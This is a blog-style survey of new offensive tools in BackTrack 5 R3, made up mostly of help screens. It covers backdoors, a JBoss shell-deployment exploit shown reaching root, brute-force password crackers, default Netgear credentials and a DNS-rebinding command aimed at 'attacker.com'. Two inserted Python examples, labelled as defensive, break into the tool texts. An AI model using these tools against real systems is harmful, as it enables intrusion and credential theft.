Welcome Back, My Friends, to the Show That Never Ends…

Testing Backtrack 5R3 - the list below shows 30 new programs, and I'm still finding more!!

7 - New Programs in Backdoors
5 - New Programs in exploits
18 - New programs in passwords
8 - New tools in web

root@bt:~# lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 10.04.3 LTS
Release: 10.04
Codename: lucid

root@bt:~# cat /etc/issue
BackTrack 5 R3 - 32 Bit \n \l
root@bt:~#

------------------------------------------------

Comparing Backtrack 5R1 programs with Backtrack 5R3

pentest directory

Backtrack 5R1

root@bt:/pentest# ls
backdoors exploits passwords scanners voip
bluetooth forensics python sniffers web
cisco fuzzers reporting stressing windows-binaries
database libs reverse-engineering telephony wireless
enumeration misc rfid tunneling

Backtrack 5R3

root@bt:/pentest# ls
backdoors exploits passwords scanners voip
bluetooth forensics python sniffers web
cisco fuzzers reporting stressing windows-binaries
database libs reverse-engineering telephony wireless
enumeration misc rfid tunneling

No new directories

------------------------------------------------

Backdoors directory

Backtrack 5R1

root@bt:/pentest/backdoors# ls
3proxy cymothoa dns2tcp iodine ptunnel web

Backtrack 5R3

root@bt:/pentest/backdoors# ls
3proxy dbd intersect powersploit socat u3-pwn web
cymothoa dns2tcp iodine ptunnel trixd00r unix-privesc-check

7 - New Programs in Backdoors

1. dbd - dbd is a Netcat-clone, designed to be portable and offer strong encryption.

2. intersect - Post Exploitation Framework
root@bt:/pentest/backdoors/intersect# ./Create.py

post-exploitation framework

Intersect 2.5 - Script Creation Utility
------------------------------------------
1 => Create Custom Script
2 => List Available Modules
3 => Load Plugin Module
4 => Exit Creation Utility

=> 2

Intersect 2.5 - Script Creation Utility
------- List of Intersect Modules --------

Standard Modules:
archive creds extras network reversexor scrub
bshell daemon lanmap osuser rshell xorshell

Custom Modules:
aeshttp getrepos openshares portscan privesc~ udpbind xmlcrack
egressbuster icmpshell persistent privesc sniff webproxy xmpp
-------------------------------------------
1 => Return to main menu.
=>

3. powersploit - PowerSploit is a series of Microsoft PowerShell scripts that can be used in post-exploitation scenarios during authorized penetration tests.

4. socat - not sure yet, as the directory is empty:
root@bt:/pentest/backdoors/socat# ls -l
total 0

5. u3-pwn
root@bt:/pentest/backdoors/u3-pwn# ./U3-Pwn.py


************************************************************************
U3-Pwn Metasploit Payload Injection Tool For SanDisk Devices
************************************************************************

U3-Pwn Main Menu:

1. Generate & Replace Iso Image.
2. Generate & Replace With Custom Exe.
3. Mass U3 Pwnage - Multi device attack.
4. Find Out U3 SanDisk Device Information.
5. Replace Iso Image With Original U3 Iso.
6. About U3-Pwn & Disclaimer.
7. Exit U3-Pwn.

Enter the number:

6. trixd00r - an advanced and invisible userland backdoor based on TCP/IP for UNIX systems. It consists of a server and a client. The server sits and waits for magic packets using a sniffer. When a magic packet arrives, it binds a shell over TCP or UDP on the given port, or connects back to the client over TCP or UDP. The client is used to send magic packets to trigger the server and get a shell.

root@bt:/pentest/backdoors/trixd00r# ./trixd00rd -H
+------------------------------------------+
| trixd00rd - http://www.nullsecurity.net/ |
+------------------------------------------+
usage:

trixd00rd -i [options]

options:

-i - interface to use
-t - magic packet type - ? to list all (default TCP SYN)
-p - magic payload string to trigger shell (default opensesame)
-s - shell mode - ? to list all (default TCP bind port)
-b - port for shell (default 31337)
-a - allow only this host to talk to trixd00rd (default ANY)
-c - connect back host
-z - magic payload string to quit trixd00rd (default byebye)
-d - daemonize trixd00rd and put in background
-n - send no welcome and bye banner
-x - use ssl (only available in priv8 version!)
-v - verbose mode (default quiet)
-V - show trixd00rd version
-H - show help and usage

7. unix-privesc-check

root@bt:/pentest/backdoors/unix-privesc-check# ./unix-privesc-check
unix-privesc-check v1.4 ( http://pentestmonkey.net/tools/unix-privesc-check )

Usage: unix-privesc-check { standard | detailed }

"standard" mode: Speed-optimised check of lots of security settings.

"detailed" mode: Same as standard mode, but also checks perms of open file
handles and called files (e.g. parsed from shell scripts,
linked .so files). This mode is slow and prone to false
positives but might help you find more subtle flaws in 3rd
party programs.

This script checks file permissions and other settings that could allow
local users to escalate privileges.

Use of this script is only permitted on systems which you have been granted
legal permission to perform a security assessment of. Apart from this
condition the GPL v2 applies.

Search the output for the word 'WARNING'. If you don't see it then this
script didn't find any problems.

example

root@bt:/pentest/backdoors/unix-privesc-check# ./unix-privesc-check standard
Assuming the OS is: linux
Starting unix-privesc-check v1.4 ( http://pentestmonkey.net/tools/unix-privesc-check )

This script checks file permissions and other settings that could allow
local users to escalate privileges.

Use of this script is only permitted on systems which you have been granted
legal permission to perform a security assessment of. Apart from this
condition the GPL v2 applies.

Search the output below for the word 'WARNING'. If you don't see it then
this script didn't find any problems.

############################################
Recording hostname
############################################
bt

############################################
Recording uname
############################################
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux

############################################
Recording Interface IP addresses
############################################

----------------------------------------------------

Exploits directory

Backtrack 5R1

root@bt:/pentest/exploits# ls
exploitdb framework isr-evilgrade set
fasttrack framework2 sapyto spamhole

Backtrack 5R3

root@bt:/pentest/exploits# ls
exploitdb framework2 netgear-telnetenable set termineter
fasttrack isr-evilgrade rebind smartphone-pentest-framework websploit
framework jboss-autopwn sapyto spamhole

5 - New Programs in exploits

1. netgear-telnetenable

telnetenable.py
Paul Gebheim
Translated from the C source available from
http://wiki.openwrt.org/oldwiki/openwrtdocs/hardware/netgear/telnetconsole

Running:
python telnetenable.py

IP - The IP of your Netgear device, usually 192.168.1.1

MAC - The mac address should be the MAC address of the LAN port on your Netgear device, WITHOUT the ":". e.g. "00:40:5E:21:14:4E" would be written as "00405E21144E".

Username - Username for accessing the telnet console, usually 'Gearguy'

Password - Password for accessing the telnet console, usually 'Geardog'

2. rebind - Rebind is a tool that implements the multiple A record DNS rebinding attack. Although this tool was originally written to target home routers, it can be used to target any public (non RFC1918) IP address.

./rebind -i eth0 -d attacker.com

3. smartphone-pentest-framework - looks to be a big tool!

root@bt:/pentest/exploits/smartphone-pentest-framework/frameworkconsole# ./framework.pl
################################################
# #
# Welcome to the Smartphone Pentest Framework! #
# v0.1 #
# Georgia Weidman/Bulb Security #
# #
################################################

Select An Option from the Menu:

1.) Attach Framework to a Deployed Agent
2.) Send Commands to an Agent
3.) View Information Gathered
4.) Attach Framework to a Mobile Modem
5.) Run a remote attack
6.) Run a social engineering or client side attack
7.) Clear/Create Database
0.) Exit

spf>

4. websploit

root@bt:/pentest/exploits/websploit# ./websploit


[*] WebSploit Toolkit [*]
[*] Version : 1.9 [*]
[*] Codename : '#Joyless OpS' [*]
[*] Report Bug : 0x0ptim0us@Gmail.com [*]
[*] Created By : Fardin Allahverdinazhand [*]
[*] Developer : Milad Kahsari Alhadi (C3phalex1n_0x)[*]
[*] Follow Me On Twitter : 0x0ptim0us [*]

Project Home : http://sourceforge.net/projects/websploit
Development TM : Secure-Land.Net

ID & Name                  Description
------------               --------------
[1]WebSite Attack Vector   Scanners,Crawlers For WebSite
[2]Network Attack Vector   Network Attack Tools
[3]Automatic Exploiter     Automatic Exploit Vulnerability
[4]Format Infector         Inject Custom Payload Into File Formats
[5]Web Tools               WebSite Tools

[88]Update                 Update WebSploit Toolkit
[99]Exit                   Exit

wsf >

5. jboss-autopwn

This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to
provide an interactive session.

USAGE
=====

Use e.sh for *nix targets that use bind_tcp and reverse_tcp

./e.sh target_ip tcp_port

Use e2.sh for Windows targets that can execute Metasploit Windows payloads

./e2.sh target_ip tcp_port

EXAMPLES
========

Linux bind shell:

[root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[x] .war file created successfully in /tmp
[x] Now deploying .war file:
http://192.168.1.2:8080/browser/browser/browser.jsp
[x] Running as user...:
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[x] Server uname...:

------------------------------------------------

Passwords directory

Backtrack 5R1

root@bt:/pentest/passwords# ls
cewl crunch hashcat-utils oclhashcat pack
chntpw cupp john oclhashcat+ sipcrack
cmospwd hashcat keimpx oclhashcat-lite wordlists

Backtrack 5R3

root@bt:/pentest/passwords# ls
acccheck findmyhash keimpx phrasendrescher sucrack
cewl hashcat manglefizz pipal truecrack
chntpw hashcat-gui oclhashcat rainbowcrack twofi
cmospwd hashcat-utils oclhashcat+ rainbowcrack-mt wce
creddump hash-identifier oclhashcat-lite sipcrack wordlists
crunch john pack smbexec
cupp johnny patator statsprocessor

18 - New programs in passwords

1. acccheck

root@bt:/pentest/passwords/acccheck# ./acccheck.pl

acccheck.pl v0.2.1 - By Faiz

Description:
Attempts to connect to the IPC$ and ADMIN$ shares depending on which flags have been
chosen, and tries a combination of usernames and passwords in the hope to identify
the password to a given account via a dictionary password guessing attack.

Usage = ./acccheck.pl [optional]

-t [single host IP address]
OR
-T [file containing target ip address(es)]

Optional:
-p [single password]
-P [file containing passwords]
-u [single user]
-U [file containing usernames]
-v [verbose mode]

Examples
Attempt the 'Administrator' account with a [BLANK] password.
acccheck.pl -t 10.10.10.1
Attempt all passwords in 'password.txt' against the 'Administrator' account.
acccheck.pl -t 10.10.10.1 -P password.txt
Attempt all passwords in 'password.txt' against all users in 'users.txt'.
acccheck.pl -t 10.10.10.1 -U users.txt -P password.txt
Attempt a single password against a single user.
acccheck.pl -t 10.10.10.1 -u administrator -p password

2. findmyhash

root@bt:/pentest/passwords/findmyhash# ./findmyhash.py
./findmyhash.py 1.1.2 ( http://code.google.com/p/findmyhash/ )

Usage:
------

python ./findmyhash.py OPTIONS

Accepted algorithms are:
------------------------

MD4 - RFC 1320
MD5 - RFC 1321
SHA1 - RFC 3174 (FIPS 180-3)
SHA224 - RFC 3874 (FIPS 180-3)
SHA256 - FIPS 180-3
SHA384 - FIPS 180-3
SHA512 - FIPS 180-3
RMD160 - RFC 2857
GOST - RFC 5831
WHIRLPOOL - ISO/IEC 10118-3:2004
LM - Microsoft Windows hash
NTLM - Microsoft Windows hash
MYSQL - MySQL 3, 4, 5 hash
CISCO7 - Cisco IOS type 7 encrypted passwords
JUNIPER - Juniper Networks $9$ encrypted passwords
LDAP_MD5 - MD5 Base64 encoded
LDAP_SHA1 - SHA1 Base64 encoded

NOTE: for LM / NTLM it is recommended to introduce both values with this format:
python ./findmyhash.py LM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7
python ./findmyhash.py NTLM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7

Valid OPTIONS are:
------------------

-h If you only want to crack one hash, specify its value with this option.

-f If you have several hashes, you can specify a file with one hash per line.
NOTE: All of them have to be the same type.

-g If your hash cannot be cracked, search it in Google and show all the results.
NOTE: This option ONLY works with -h (one hash input) option.

Examples:
---------

-> Try to crack only one hash.
python ./findmyhash.py MD5 -h 098f6bcd4621d373cade4e832627b4f6

-> Try to crack a JUNIPER encrypted password escaping special characters.
python ./findmyhash.py JUNIPER -h "\$9\$LbHX-wg4Z"

-> If the hash cannot be cracked, it will be searched in Google.
python ./findmyhash.py LDAP_SHA1 -h "{SHA}cRDtpNCeBiql5KOQsKVyrA0sAiA=" -g

-> Try to crack multiple hashes using a file (one hash per line).
python ./findmyhash.py MYSQL -f mysqlhashesfile.txt

Contact:
--------

[Web] http://laxmarcaellugar.blogspot.com/
[Mail/Google+] bloglaxmarcaellugar@gmail.com
[twitter] @laXmarcaellugar

3. phrasendrescher

root@bt:/pentest/passwords/phrasendrescher# ./pd -h
phrasen|drescher 1.1.1 - the passphrase cracker
Copyright (C) 2008 Nico Leidecker; http://www.leidecker.info

Usage: ./pd plugin [options]

Available plugins:
mssql http-raw ssh rsa-dsa

General Options:
h : print this message
v : verbose mode
i from[:to] : incremental mode beginning with word length `from'
and going to `to'
d file : run dictionary based with words from `file'
w number : number of worker threads (default is one)
r rules : specify rewriting rules for the dictionary mode:
A = all characters upper case
F = first character upper case
L = last character upper case
W = first letter of each word to upper case
a = all characters lower case
f = first character lower case
l = last character lower case
w = first letter of each word to lower case
D = prepend digit
d = append digit
e = 1337 characters
x = all rules

Environment Variables:
PD_PLUGINS : the directory containing plugins
PD_CHARMAP : the characters for the incremental mode are
taken from a character list. A customized list
can be specified in the environment variable

4. sucrack - sucrack is a multithreaded Linux/UNIX tool for cracking local user accounts by brute-forcing su(1) with a wordlist.
Before you run sucrack, take a look at the help message or the manpage:

sucrack -h
man sucrack

In order to run sucrack now, you need to specify a wordlist:

sucrack wordlist.txt

You generally have two options for printing the progress and the
statistics (if you have compiled sucrack with the `--enable-statistics'
flag): with ANSI escape codes, which makes it look nicer, or without.
The -a flag indicates whether ANSI escape codes should be used.

sucrack -a wordlist.txt

The interval for reprinting the statistics is set to 3 seconds by default.
You can alter that interval using the -s flag or disable the auto
reprinting functionality and print the output on any key pressed.

sucrack -s 10 -a wordlist.txt

This disables the auto reprinting functionality:

sucrack -c -a wordlist.txt

By default, failed authentications on various Linux distributions cause a
three-second delay. sucrack is multithreaded, so that while a thread is
waiting out those seconds, others can call su. It is not advisable to run
sucrack with more than one worker thread if there is no such delay, as it
slows down the overall process.
Run sucrack with ten worker threads:

sucrack -w 10 wordlist.txt

There is another thread running besides the worker threads. The
dictionary thread reads the words from the wordlist and puts them into
an internal buffer. By default, that buffer is a static array.
You can set the buffer to be a dynamic list with the `--with-dynamic-list'
configuration flag. In both cases, you can alter the size of the buffer
with the -b option. By default, the buffer size is set to the number of
worker threads plus one. Note that it can never be less than that.

sucrack -b 50 -w 10 wordlist.txt

In that example, the dictionary thread will always try to have 50 words
in the buffer to offer them to the 10 worker threads.

If you want to su to a user other than root, specify the username
with the -u flag:

sucrack -u myuser wordlist.txt

The rewriter is a helpful add-on. It rewrites the words from the word
list according to certain rules and enqueues them into the word buffer. To
enable the rewriter use -r, and to set up your rules use -l:

sucrack -r -l AFL wordlist.txt

Here is an overview over the rules:

rule  description                     original      rewritten

A     all characters to upper case    myPassword    MYPASSWORD
F     first character to upper case   myPassword    MyPassword
L     last character to upper case    myPassword    myPassworD
a     all characters to lower case    AnotherPASS   anotherpass
f     first character to lower case   AnotherPASS   anotherPASS
l     last character to lower case    AnotherPASS   AnotherPASs
D     prepend a digit (0..9)          password      1password
d     append a digit (0..9)           password      password1
e     1337ify the word                password      p455w0rd
x     enable all of the above rules

All rules run at least once. The `D' and `d' rules rewrite a word ten times,
prepending or appending each digit once.
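The rule letters above are the same set that phrasen|drescher accepts with -r (plus its W/w per-word rules) and that sucrack accepts with -l. The following is an added example, not code from either tool: it implements those rules in Python so a defender can check whether a candidate password is just a single-rule rewrite of a dictionary word. Assumptions: the 1337 map beyond the page's one example (a 4, e 3, i 1, o 0, s 5, t 7) is mine, rules are applied one at a time rather than chained, and the unmodified word is treated as a candidate too.

```python
"""Wordlist rewrite rules as documented for phrasen|drescher (-r) and sucrack (-l).

Added example; not the tools' own code. Used here defensively: reject a new
password if it is derivable from a known word by any single rule.
"""
import re
from itertools import chain

# Assumed 1337 substitution map; the page only shows "password" -> "p455w0rd".
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5", "t": "7"})


def _words_upper(word):
    """W: first letter of each word to upper case."""
    return re.sub(r"\b\w", lambda m: m.group(0).upper(), word)


def _words_lower(word):
    """w: first letter of each word to lower case."""
    return re.sub(r"\b\w", lambda m: m.group(0).lower(), word)


# Rules that produce exactly one rewrite of the input word.
SINGLE_RULES = {
    "A": str.upper,                              # all characters upper case
    "F": lambda w: w[:1].upper() + w[1:],        # first character upper case
    "L": lambda w: w[:-1] + w[-1:].upper(),      # last character upper case
    "W": _words_upper,
    "a": str.lower,                              # all characters lower case
    "f": lambda w: w[:1].lower() + w[1:],        # first character lower case
    "l": lambda w: w[:-1] + w[-1:].lower(),      # last character lower case
    "w": _words_lower,
    "e": lambda w: w.translate(LEET),            # 1337 characters
}

ALL_RULES = "AFLWaflwDde"


def apply_rule(word, rule):
    """Return the list of rewrites one rule letter produces (D and d give ten each)."""
    if rule == "D":
        return [str(n) + word for n in range(10)]        # prepend a digit
    if rule == "d":
        return [word + str(n) for n in range(10)]        # append a digit
    if rule == "x":                                      # x = all rules
        return list(chain.from_iterable(apply_rule(word, r) for r in ALL_RULES))
    if rule not in SINGLE_RULES:
        raise ValueError(f"unknown rule {rule!r}")
    return [SINGLE_RULES[rule](word)]


def rewrite(word, rules):
    """All candidates for `word` under a rule string such as "AFL".

    Every rule runs once (as the sucrack text says), each applied to the
    original word, not chained; the original word is kept as the first
    candidate (an assumption). Duplicates are dropped, order preserved.
    """
    seen = {}
    for cand in chain([word], *(apply_rule(word, r) for r in rules)):
        seen.setdefault(cand, None)
    return list(seen)


def is_trivial_mangling(candidate, base_words, rules="x"):
    """True if `candidate` is a base word or a single-rule rewrite of one.

    A password policy can use this to reject passwords that any of the
    documented rewrite rules would reach from a common-word list.
    """
    return any(candidate in rewrite(w, rules) for w in base_words)


if __name__ == "__main__":
    # Constructed sample: a tiny base list and a few candidates to judge.
    base = ["password", "myPassword"]
    for cand in ["p455w0rd", "MYPASSWORD", "password7", "Password1"]:
        print(cand, "-> trivial" if is_trivial_mangling(cand, base) else "-> ok")
```

Only `Password1` survives the check, because it needs two rules (F then d) and the documented rules are applied one at a time.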

Environment Variables

sucrack depends on the responses su gives on a failing authentication.
Because that can vary from version to version and distribution to
distribution you can set the expected responses in environment variables.

environment variable      description

SUCRACK_SU_PATH           the path to su
SUCRACK_AUTH_FAILURE      the response of su, if an authentication fails
SUCRACK_AUTH_SUCCESS      the response sucrack should receive, if an
                          authentication attempt succeeded

It is very important to set SUCRACK_AUTH_SUCCESS to a string that cannot
be a response of su and does not appear in the wordlist file. Test it
before running sucrack:

export SUCRACK_AUTH_SUCCESS=banzaii
grep $SUCRACK_AUTH_SUCCESS wordlist.txt
sucrack wordlist.txt

Troubleshooting & Notice

sucrack was tested on Linux, FreeBSD and NetBSD. OpenBSD is known not to be supported yet.

If you encounter any bugs not listed in this section, please report them to nico@leidecker.info

5. hashcat

root@bt:/pentest/passwords/hashcat# ./hashcat-cli32.bin --help
hashcat, advanced password recovery

Usage: hashcat [options] hashfile [mask|wordfiles|directories]

=======
Options
=======

* General:

-m, --hash-type=NUM Hash-type, see references below
-a, --attack-mode=NUM Attack-mode, see references below
-V, --version Print version
-h, --help Print help
--eula Print EULA
--quiet Suppress output

* Misc:

--hex-charset Assume charset is given in hex

* Files:

-p, --seperator=CHAR Define seperator char for hashlists/outfile
-o, --output-file=FILE output-file for recovered hashes
--output-format=NUM 0 = hash:pass
1 = hash:hex_pass
2 = hash:pass:hex_pass
--remove Enable remove of hash once it is cracked
--stdout stdout mode
--disable-potfile do not write potfile
--debug-file=FILE debug-file
--debug-mode=NUM 1 = save finding rule (hybrid only)
2 = save original word (hybrid only)
-e, --salt-file=FILE salts-file for unsalted hashlists

* Resources:

-c, --segment-size=NUM Size in MB to cache from the wordfile
-n, --threads=NUM number of threads
-s, --words-skip=NUM skip number of words (for resume)
-l, --words-limit=NUM limit number of words (for distributed)

* Rules:

-r, --rules-file=FILE Rules-file, multi use: -r 1.rule -r 2.rule
-g, --generate-rules=NUM Generate NUM random rules
--generate-rules-func-min=NUM Force NUM functions per random rule min
--generate-rules-func-max=NUM Force NUM functions per random rule max

* Custom charsets:

-1, --custom-charset1=CS User-defined charsets
-2, --custom-charset2=CS Example:
-3, --custom-charset3=CS --custom-charset1=?dabcdef
-4, --custom-charset4=CS Sets charset ?1 to 0123456789abcdef

* Toggle-Case attack-mode specific:

--toggle-min=NUM number of alphas in dictionary minimum
--toggle-max=NUM number of alphas in dictionary maximum

* Mask-attack attack-mode specific:

--pw-min=NUM Password-length minimum
--pw-max=NUM Password-length maximum

* Permutation attack-mode specific:

--perm-min=NUM Filter words shorter than NUM
--perm-max=NUM Filter words larger than NUM

* Table-Lookup attack-mode specific:

-t, --table-file=FILE table file
--table-min=NUM number of chars in dictionary minimum
--table-max=NUM number of chars in dictionary maximum

==========
References
==========

* Built-in charsets:

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;?@[\]^_`{|}~
?h = 8 bit characters from 0xc0 - 0xff
?D = 8 bit characters from german alphabet
?F = 8 bit characters from french alphabet
?R = 8 bit characters from russian alphabet

* Attack modes:

0 = Straight
1 = Combination
2 = Toggle-Case
3 = Brute-force
4 = Permutation
5 = Table-Lookup

* Hash types:

0 = MD5
10 = md5($pass.$salt)
20 = md5($salt.$pass)
100 = SHA1
110 = sha1($pass.$salt)
120 = sha1($salt.$pass)
200 = MySQL
300 = MySQL4.1/MySQL5
400 = phpass, MD5(WordPress), MD5(phpBB3)
500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
800 = SHA-1(Django)
900 = MD4
1000 = NTLM
1100 = Domain Cached Credentials, mscash
1400 = SHA256
1410 = sha256($pass.$salt)
1420 = sha256($salt.$pass)
1600 = md5apr1, MD5(APR), Apache MD5
1700 = SHA512
1710 = sha512($pass.$salt)
1720 = sha512($salt.$pass)
1800 = SHA-512(Unix)
2600 = Double MD5
3300 = MD5(Sun)
3500 = md5(md5(md5($pass)))
3610 = md5(md5($salt).$pass)
3710 = md5($salt.md5($pass))
3810 = md5($salt.$pass.$salt)
3910 = md5(md5($pass).md5($salt))
4010 = md5($salt.md5($salt.$pass))
4110 = md5($salt.md5($pass.$salt))
4210 = md5($username.0.$pass)
4300 = md5(strtoupper(md5($pass)))
4400 = md5(sha1($pass))
4500 = sha1(sha1($pass))
4600 = sha1(sha1(sha1($pass)))
4700 = sha1(md5($pass))
4800 = MD5(Chap)

* Specific hash types:

101 = nsldap, SHA-1(Base64), Netscape LDAP SHA
111 = nsldaps, SSHA-1(Base64), Netscape LDAP SSHA
121 = SMF > v1.1
131 = MSSQL
2611 = vBulletin v3.8.5
2811 = IPB2+, MyBB1.2+
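The mask-attack options above (built-in charsets ?l ?u ?d ?s, the -1..-4 custom charsets and --pw-min/--pw-max) determine how large a keyspace an attacker must cover. The following is an added example, not hashcat's code: a small keyspace calculator for those masks, useful when judging whether a password-composition policy leaves only a pattern that a mask attack exhausts quickly. Assumptions: ?s is taken exactly as printed on this page, the 8-bit sets ?h/?D/?F/?R are not modelled, and the cracking rate is supplied by the reader.

```python
"""Keyspace calculator for hashcat mask attacks (attack mode 3).

Added example, not hashcat's own code. Models the built-in charsets listed
in the help above and the custom-charset syntax (-1 ... -4, e.g. "?dabcdef").
"""
import string

# Built-in charsets; ?s is copied from the page's printout (29 characters).
BUILTIN = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": "!\"#$%&'()*+,-./:;?@[\\]^_`{|}~",
}


def expand_charset(spec, custom=None):
    """Expand a charset spec such as '?dabcdef' into the characters it denotes.

    '?l' '?u' '?d' '?s' are built-ins, '?1'..'?4' refer to custom charsets
    defined earlier, '??' is a literal '?', anything else is literal.
    Duplicates are removed, order preserved.
    """
    custom = custom or {}
    chars, i = [], 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key == "?":
                chars.append("?")
            elif key in BUILTIN:
                chars.extend(BUILTIN[key])
            elif key in custom:
                chars.extend(custom[key])
            else:
                raise ValueError(f"unsupported charset ?{key}")
            i += 2
        else:
            chars.append(spec[i])
            i += 1
    return "".join(dict.fromkeys(chars))


def define_custom(defs):
    """Expand custom charsets given as {'1': '?dabcdef', '2': '?1?u'}.

    Later charsets may reference earlier ones, so they are expanded in order.
    """
    custom = {}
    for key, spec in sorted(defs.items()):
        custom[key] = expand_charset(spec, custom)
    return custom


def mask_positions(mask, custom=None):
    """Split a mask into one charset per position; a literal char is a 1-char set."""
    custom = custom or {}
    positions, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            positions.append(expand_charset(mask[i:i + 2], custom))
            i += 2
        else:
            positions.append(mask[i])
            i += 1
    return positions


def keyspace(mask, custom=None):
    """Number of candidates the mask generates (product of charset sizes)."""
    size = 1
    for charset in mask_positions(mask, custom):
        size *= len(charset)
    return size


def seconds_to_exhaust(mask, rate_per_second, custom=None):
    """Worst-case time to try every candidate at a given hashes-per-second rate."""
    return keyspace(mask, custom) / rate_per_second


if __name__ == "__main__":
    # Constructed policy example: "capital, five lower-case letters, two digits".
    custom = define_custom({"1": "?dabcdef"})          # hex charset from the help text
    for mask in ["?u?l?l?l?l?l?d?d", "?1?1?1?1?1?1?1?1"]:
        print(mask, keyspace(mask, custom), "candidates")
```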

6. manglefizz

root@bt:/pentest/passwords/manglefizz# ./manglefizz
manglefizz v1.1 by Fizz

./manglefizz [options]

OPTIONS:

-f , --forenames
Input text file containing a list of forenames, one per line. If
not specified, the file 'first.txt' is used.

-l , --length
Restrict the length of the output to a number of characters. Must
be 6 or larger, but no larger than 20.

-n, --number
Adds the numbers 1, 2 or 3 to the end of a mangled username. Must
be used with a length specification.

-o , --output
Output text file of mangled names, one per line. If not specified
then output is sent to stdout.

-p , --postfix
The text to be appended to the end of all mangled user names.

-r , --prefix
The text to be prefixed to the beginning of all mangled user names.

-s , --surnames
Input text file containing a list of surnames, one per line. If
not specified, the file 'last.txt' is used.

-v, --verbose
Will output version and summary information.

-x, --extreme-verbose
Verbose on drugs. Includes all verbose output, plus debug info.

MANGLE:

first, firstname, forename
Will represent a single line from the forenames text file. Cannot be
used together with 'initial' or 'initials'.

initial
Will represent a single initial, a letter from a-z. Cannot be used
together with 'first', 'firstname', 'forename' or 'initials'.

initials
Will represent single or double character initials, letter(s) from a-zz.
Cannot be used together with 'first', 'firstname', 'forename' or
'initial'.

last, lastname, forenames
Will represent a single line from the surnames text file.

-, ., _
These represent separator characters. One separator character only.
Can only be used to separate.

MANGLE EXAMPLES:

For a forename of John and a surname of Doe

initialforename = jdoe

first.lastname = john.doe

lastnameinitial = doej

7. pipal - Pipal, a password analyser, to run on a password dump from the DC

Usage is fairly simple, -? will give you full instructions:

$ ./pipal.rb -?
pipal 1.0 Robin Wood (robin@digininja.org) (www.digininja.org)

Usage: pipal [OPTION] ... FILENAME
--help, -h: show help
--top, -t X: show the top X results (default 10)
--output, -o : output to file
--external, -e : external file to compare words against

FILENAME: The file to count

8. truecrack - ha ha, I'd like to see how long this would take! lol

root@bt:/pentest/passwords/truecrack# ./truecrack
Bruteforce password cracker for Truecrypt volume.
Optimized with Nvidia Cuda technology.
Based on TrueCrypt, freely available at http://www.truecrypt.org/
Copyright (c) 2011 by Luca Vaccaro
Usage: ./truecrack options [ inputfile | value ] volumefile
-h --help Display this usage information.
-t --truecrypt FILE Truecrypt volume file.
-w --wordlist FILE Wordlist mode, read words from FILE.
-m --maxlength INT Charset mode, max length of words generated.
-c --charset STRING Charset mode, create words from charset STRING.
-b --blocksize INT Block size of words parallel computed.
-v --verbose Show cracked passwords.

9. hashcat-gui - hashcat-gui is a graphical user interface for the hashcat tools "hashcat",

root@bt:/pentest/passwords/hashcat-gui# ./hashcat-gui32.bin

10. rainbowcrack

root@bt:/pentest/passwords/rainbowcrack# ./rcrack
RainbowCrack 1.5
Copyright 2003-2010 RainbowCrack Project. All rights reserved.
Official Website: http://project-rainbowcrack.com/

usage: rcrack rt_files [rt_files ...] -h hash
rcrack rt_files [rt_files ...] -l hash_list_file
rcrack rt_files [rt_files ...] -f pwdump_file
rcrack rt_files [rt_files ...] -n pwdump_file
rt_files: path to the rainbow table(s), wildchar(*, ?) supported
-h hash: load single hash
-l hash_list_file: load hashes from a file, each hash in a line
-f pwdump_file: load lanmanager hashes from pwdump file
-n pwdump_file: load ntlm hashes from pwdump file

hash algorithms implemented in alglib0.so:
lm, plaintext_len limit: 0 - 7
ntlm, plaintext_len limit: 0 - 15
md5, plaintext_len limit: 0 - 15
sha1, plaintext_len limit: 0 - 20
mysqlsha1, plaintext_len limit: 0 - 20
halflmchall, plaintext_len limit: 0 - 7
ntlmchall, plaintext_len limit: 0 - 15
oracle-SYSTEM, plaintext_len limit: 0 - 10
md5-half, plaintext_len limit: 0 - 15

example: rcrack *.rt -h 5d41402abc4b2a76b9719d911017c592
rcrack *.rt -l hash.txt

11. twofi

When attempting to crack passwords, custom word lists are very useful additions to
standard dictionaries. An interesting idea originally released on the "7 Habits of
Highly Effective Hackers" blog was to use Twitter to help generate those lists
based on searches for keywords related to the list that is being cracked. I've
expanded this idea into which will take multiple search terms and return a
word list sorted by most common first.

root@bt:/pentest/passwords/twofi# ./twofi.rb
You must specify at least one search term or username

twofi 1.0 Robin Wood (robin@digininja.org) (www.digininja.org)
twofi - Twitter Words Of Interest

Usage: twofi [OPTIONS]
--help, -h: show help
--count, -c: include the count with the words
--min_word_length, -m: minimum word length
--term_file, -T file: a file containing a list of terms
--terms, -t: comma separated search terms
quote words containing spaces, no space after commas
--user_file, -U file: a file containing a list of users
--users, -u: comma separated search terms
quote words containing spaces, no space after commas
--verbose, -v: verbose

12. rainbowcrack-mt

root@bt:/pentest/passwords/rainbowcrack-mt# ./rcracki_mt
RainbowCrack (improved, multi-threaded) 2.0 - Making a Faster Cryptanalytic Time-Memory Trade-Off
by Martin Westergaard
multi-threaded and enhanced by neinbrucke
http://www.freerainbowtables.com/
original code by Zhu Shuanglei
http://www.antsight.com/zsl/rainbowcrack/

usage: rcracki_mt -h hash rainbow_table_pathname
rcracki_mt -l hash_list_file rainbow_table_pathname
rcracki_mt -f pwdump_file rainbow_table_pathname
rcracki_mt -c lst_file rainbow_table_pathname

-h hash: use raw hash as input
-l hash_list_file: use hash list file as input, each hash in a line
-f pwdump_file: use pwdump file as input, handles lanmanager hash only
